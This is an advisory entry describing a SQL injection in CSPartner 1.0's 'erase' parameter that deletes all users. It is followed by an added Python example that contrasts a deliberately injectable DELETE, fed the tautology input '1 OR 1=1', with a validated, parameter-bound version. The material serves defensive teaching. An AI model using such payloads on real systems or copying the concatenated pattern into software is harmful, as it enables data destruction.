Vendor: CSPartner
By: StAkeR
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: CSPartner
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:cspartner:cspartner:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit
This remote exploit targets CSPartner 1.0. A SQL injection vulnerability in the 'gestion.php' file allows an attacker to delete all users from the system. The exploit works by sending a malicious request to the 'erase' parameter in the 'index.php' file, where the attacker uses the 'or' operator to bypass the authentication and delete all users from the system.
Mitigation:
The best way to mitigate this vulnerability is to update the software to the latest version and ensure that all security patches are applied.
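For anyone auditing similar delete handlers, the following added example (not CSPartner's code and not part of the original advisory) contrasts a concatenated DELETE with a validated, parameter-bound one using Python's sqlite3 module. The users table, its columns, the function names, the is_admin flag and the sample inputs are all assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for an application's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO users (name) VALUES (?)",
                   [("alice",), ("bob",), ("carol",)])
    return db

def count_users(db):
    return db.execute("SELECT COUNT(*) FROM users").fetchone()[0]

def erase_concatenated(db, erase):
    """Vulnerable pattern: the request value becomes part of the SQL text,
    so an 'or' clause in it changes which rows the WHERE matches."""
    db.execute("DELETE FROM users WHERE id = " + erase)
    return count_users(db)

def erase_bound(db, erase, is_admin):
    """Hardened pattern: server-side authorization check, strict integer
    validation, then a bound parameter that is never parsed as SQL."""
    if not is_admin:
        raise PermissionError("delete requires an authenticated admin")
    if not (erase.isascii() and erase.isdigit()):
        raise ValueError("erase must be a numeric id")
    db.execute("DELETE FROM users WHERE id = ?", (int(erase),))
    return count_users(db)

if __name__ == "__main__":
    tautology = "1 OR 1=1"  # constructed sample input

    db = make_db()
    print("concatenated, rows left:", erase_concatenated(db, tautology))

    db = make_db()
    try:
        erase_bound(db, tautology, is_admin=True)
    except ValueError as exc:
        print("bound handler rejected input:", exc)
    print("bound, rows left:", count_users(db))
```

The same two controls apply in PHP through prepared statements (PDO or mysqli) combined with an integer check on the request value.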